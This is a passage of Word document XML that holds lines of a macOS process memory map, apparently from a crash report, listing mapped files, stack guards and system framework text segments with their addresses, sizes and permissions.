        <w:t xml:space="preserve">CoreAnimation          000000011f7f5000-000000011f8e6000 [  964K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000011faf2000-0000000120950000 [ 14.4M] r--/rwx SM=COW  ...ameworks/DataDetectorsCore.framework/Versions/A/Resources/com.apple.datadetectorscore.cache.full.asia.system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000120ac5000-0000000120f8f000 [ 4904K] r--/r-x SM=ALI  /usr/share/germantok/german.index</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000121026000-00000001228ad000 [ 24.5M] r--/r-x SM=ALI  /usr/share/langid/langid.inv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            0000000123478000-0000000123709000 [ 2628K] r--/r-- SM=S/A  /private/var/db/uuidtext/C2/5C6FB8E934349C952C26CF913BAC33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            00007000072f8000-00007000072f9000 [    4K] ---/rwx SM=NUL  stack guard for thread 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            00007000073fe000-00007000073ff000 [    4K] ---/rwx SM=NUL  stack guard for thread 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            0000700007481000-0000700007482000 [    4K] ---/rwx SM=NUL  stack guard for thread 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            0000700007504000-0000700007505000 [    4K] ---/rwx SM=NUL  stack guard for thread 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            0000700007587000-0000700007588000 [    4K] ---/rwx SM=NUL  stack guard for thread 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            000070000760a000-000070000760b000 [    4K] ---/rwx SM=NUL  stack guard for thread 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            000070000768d000-000070000768e000 [    4K] ---/rwx SM=NUL  stack guard for thread 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>STACK GUARD            00007fff51d48000-00007fff55548000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffb78bd000-00007fffb7bf6000 [ 3300K] r-x/r-x SM=COW  /System/Library/CoreServices/RawCamera.bundle/Contents/MacOS/RawCamera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb941a000-00007fffb95d9000 [ 1788K] r-x/r-x SM=COW  /System/Library/Frameworks/AVFoundation.framework/Versions/A/AVFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb95d9000-00007fffb967d000 [  656K] r-x/r-x SM=COW  /System/Library/Frameworks/AVFoundation.framework/Versions/A/Frameworks/AVFAudio.framework/Versions/A/AVFAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb9711000-00007fffb9712000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb972a000-00007fffb9c44000 [ 5224K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb9c44000-00007fffb9db5000 [ 1476K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb9db5000-00007fffb9dca000 [   84K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBNNS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffb9dca000-00007fffba1c1000 [ 4060K] r-x/r-x SM=COW  ...em/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba1c1000-00007fffba1d8000 [   92K] r-x/r-x SM=COW  ...ary/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba1d8000-00007fffba1df000 [   28K] r-x/r-x SM=COW  ...ibrary/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libQuadrature.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba1df000-00007fffba1f4000 [   84K] r-x/r-x SM=COW  ...ibrary/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffba1f4000-00007fffba37c000 [ 1568K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba37c000-00007fffba42f000 [  716K] r-x/r-x SM=COW  ...tem/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba42f000-00007fffba430000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vecLib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba430000-00007fffba471000 [  260K] r-x/r-x SM=COW  /System/Library/Frameworks/Accounts.framework/Versions/A/Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba471000-00007fffba6eb000 [ 2536K] r-x/r-x SM=COW  /System/Library/Frameworks/AddressBook.framework/Versions/A/AddressBook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffba6eb000-00007fffbb3cc000 [ 12.9M] r-x/r-x SM=COW  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb3dd000-00007fffbb3de000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb3de000-00007fffbb44d000 [  444K] r-x/r-x SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb4e6000-00007fffbb615000 [ 1212K] r-x/r-x SM=COW  ...s/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb615000-00007fffbb660000 [  300K] r-x/r-x SM=COW  ...ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb6bc000-00007fffbb6ef000 [  204K] r-x/r-x SM=COW  ...plicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libTrueTypeScaler.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffbb75a000-00007fffbb805000 [  684K] r-x/r-x SM=COW  ...rary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb805000-00007fffbb856000 [  324K] r-x/r-x SM=COW  ...ry/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb856000-00007fffbb866000 [   64K] r-x/r-x SM=COW  ...rameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb866000-00007fffbb8b4000 [  312K] r-x/r-x SM=COW  ...rary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb8b4000-00007fffbb8f0000 [  240K] r-x/r-x SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb8f0000-00007fffbb8fc000 [   48K] r-x/r-x SM=COW  ...rks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbb8fc000-00007fffbbb0b000 [ 2108K] r-x/r-x SM=COW  /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbbb0b000-00007fffbbb0c000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/AudioUnit.framework/Versions/A/AudioUnit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbbc74000-00007fffbbff9000 [ 3604K] r-x/r-x SM=COW  /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc012000-00007fffbc013000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Carbon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc013000-00007fffbc017000 [   16K] r-x/r-x SM=COW  ...tem/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CommonPanels.framework/Versions/A/CommonPanels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc017000-00007fffbc31c000 [ 3092K] r-x/r-x SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffbc31c000-00007fffbc320000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Help.framework/Versions/A/Help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc320000-00007fffbc326000 [   24K] r-x/r-x SM=COW  ...tem/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/ImageCapture.framework/Versions/A/ImageCapture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc326000-00007fffbc3be000 [  608K] r-x/r-x SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Ink.framework/Versions/A/Ink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc3be000-00007fffbc3d9000 [  108K] r-x/r-x SM=COW  ...m/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/OpenScripting.framework/Versions/A/OpenScripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc3d9000-00007fffbc3db000 [    8K] r-x/r-x SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Print.framework/Versions/A/Print</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc3db000-00007fffbc3de000 [   12K] r-x/r-x SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SecurityHI.framework/Versions/A/SecurityHI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc3de000-00007fffbc3e5000 [   28K] r-x/r-x SM=COW  ...y/Frameworks/Carbon.framework/Versions/A/Frameworks/SpeechRecognition.framework/Versions/A/SpeechRecognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc3e5000-00007fffbc4c4000 [  892K] r-x/r-x SM=COW  /System/Library/Frameworks/CloudKit.framework/Versions/A/CloudKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc4c4000-00007fffbc4c5000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc5fa000-00007fffbc68b000 [  580K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc68b000-00007fffbc69f000 [   80K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreBluetooth.framework/Versions/A/CoreBluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbc69f000-00007fffbc996000 [ 3036K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffbc996000-00007fffbca23000 [  564K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbca23000-00007fffbcebd000 [ 4712K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbcebd000-00007fffbd53c000 [ 6652K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd53c000-00007fffbd77c000 [ 2304K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreImage.framework/Versions/A/CoreImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd77c000-00007fffbd7d9000 [  372K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreLocation.framework/Versions/A/CoreLocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd7d9000-00007fffbd88a000 [  708K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreMedia.framework/Versions/A/CoreMedia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd88a000-00007fffbd8d6000 [  304K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreMediaIO.framework/Versions/A/CoreMediaIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd8d6000-00007fffbd8d7000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd8d7000-00007fffbd929000 [  328K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbd929000-00007fffbdc05000 [ 2928K] r-x/r-x SM=COW  ...m/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbdc05000-00007fffbdc39000 [  208K] r-x/r-x SM=COW  ...orks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbdc39000-00007fffbdc42000 [   36K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbdc42000-00007fffbddae000 [ 1456K] r-x/r-x SM=COW  ...y/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffbddae000-00007fffbde5f000 [  708K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbde5f000-00007fffbdebf000 [  384K] r-x/r-x SM=COW  ...m/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbdebf000-00007fffbdf30000 [  452K] r-x/r-x SM=COW  ...tem/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbdf30000-00007fffbdf77000 [  284K] r-x/r-x SM=COW  ...y/Frameworks/CoreServices.framework/Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe003000-00007fffbe14f000 [ 1328K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe14f000-00007fffbe185000 [  216K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe185000-00007fffbe1f7000 [  456K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreWLAN.framework/Versions/A/CoreWLAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe226000-00007fffbe232000 [   48K] r-x/r-x SM=COW  /System/Library/Frameworks/DirectoryService.framework/Versions/A/DirectoryService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe232000-00007fffbe2f1000 [  764K] r-x/r-x SM=COW  /System/Library/Frameworks/DiscRecording.framework/Versions/A/DiscRecording</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe2f1000-00007fffbe2f7000 [   24K] r-x/r-x SM=COW  /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe485000-00007fffbe82d000 [ 3744K] r-x/r-x SM=COW  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe858000-00007fffbe88a000 [  200K] r-x/r-x SM=COW  /System/Library/Frameworks/GSS.framework/Versions/A/GSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbe93d000-00007fffbe9e1000 [  656K] r-x/r-x SM=COW  /System/Library/Frameworks/IOBluetooth.framework/Versions/A/IOBluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffbe9e1000-00007fffbea77000 [  600K] r-x/r-x SM=COW  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbea77000-00007fffbea7e000 [   28K] r-x/r-x SM=COW  /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbea7e000-00007fffbead1000 [  332K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageCaptureCore.framework/Versions/A/ImageCaptureCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbead1000-00007fffbec28000 [ 1372K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbec28000-00007fffbec2d000 [   20K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbec2d000-00007fffbed1e000 [  964K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbed1e000-00007fffbed42000 [  144K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib</w:t>
      </w:r>
